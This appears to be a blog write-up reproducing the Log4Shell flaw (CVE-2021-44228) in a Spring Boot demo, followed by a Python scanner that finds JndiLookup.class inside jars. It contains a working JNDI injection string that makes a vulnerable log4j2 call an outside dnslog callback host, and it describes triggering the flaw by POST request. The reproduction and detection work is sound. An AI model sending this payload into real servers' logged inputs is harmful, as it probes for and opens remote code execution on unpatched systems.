CVE-2021-44228 log4j2 vulnerability reproduction
Environment setup
https://github.com/bycuimiao/springboot2-log4j2-demo
Download it and import it into IDEA.
Then create a new test class:
    package com.bycuimiao.demo;

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class test {
        private static final Logger logger = LogManager.getRootLogger();

        public static void main(final String... args) {
            // Logging this string makes a vulnerable log4j2 perform a JNDI lookup,
            // which shows up as a DNS query on the dnslog.cn callback domain.
            logger.error("${jndi:ldap://0c22zc.dnslog.cn}");
        }
    }
I packaged it into a jar. Env
https://www.o2oxy.cn/wp-content/uploads/2021/12/1111.zip
Just start it with java -jar.
Sending a POST request to the API endpoint triggers it.
The code is as follows:
https://www.o2oxy.cn/wp-content/uploads/2021/12/springboot2-log4j2-demo-master.zip
I will analyze how this vulnerability arises in a follow-up.
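To check whether a packaged build such as the Spring Boot jar above still bundles the log4j-core class that resolves ${jndi:...} lookups, here is an added example (not code from the original post or the demo project). The names scan_archive and make_jar are hypothetical, and the sample jar and its version string are constructed in memory.

```python
import io
import zipfile

# Class that performs the ${jndi:...} lookup inside log4j-core.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata shipped inside log4j-core; holds a "version=<x.y.z>" line.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def scan_archive(data, path="<archive>", depth=4):
    """Return [(archive_path, version_or_None)] for each archive containing JndiLookup.class."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return []  # not a readable archive; nothing to report
    hits = []
    with zf:
        names = set(zf.namelist())
        if JNDI_CLASS in names:
            version = None
            if POM_PROPS in names:
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
            hits.append((path, version))
        if depth > 0:  # Spring Boot fat jars keep dependencies in BOOT-INF/lib/
            for name in sorted(names):
                if name.lower().endswith((".jar", ".war", ".ear")):
                    hits += scan_archive(zf.read(name), f"{path}!/{name}", depth - 1)
    return hits

def make_jar(entries):
    """Build a jar in memory from {entry_name: bytes} (for the constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()

# Constructed sample: a fat jar with one log4j-core that has the class and one without it.
with_class = make_jar({JNDI_CLASS: b"\xca\xfe\xba\xbe", POM_PROPS: b"version=2.14.1\n"})
stripped = make_jar({POM_PROPS: b"version=2.14.1\n"})
SAMPLE = make_jar({
    "BOOT-INF/lib/log4j-core-2.14.1.jar": with_class,
    "BOOT-INF/lib/log4j-core-stripped.jar": stripped,
})

if __name__ == "__main__":
    for archive, version in scan_archive(SAMPLE, "demo.jar"):
        print(f"JndiLookup.class present: {archive} (log4j-core {version})")
```

To scan a real build, pass the bytes of the jar file (for example open(path, "rb").read()) and its path to scan_archive.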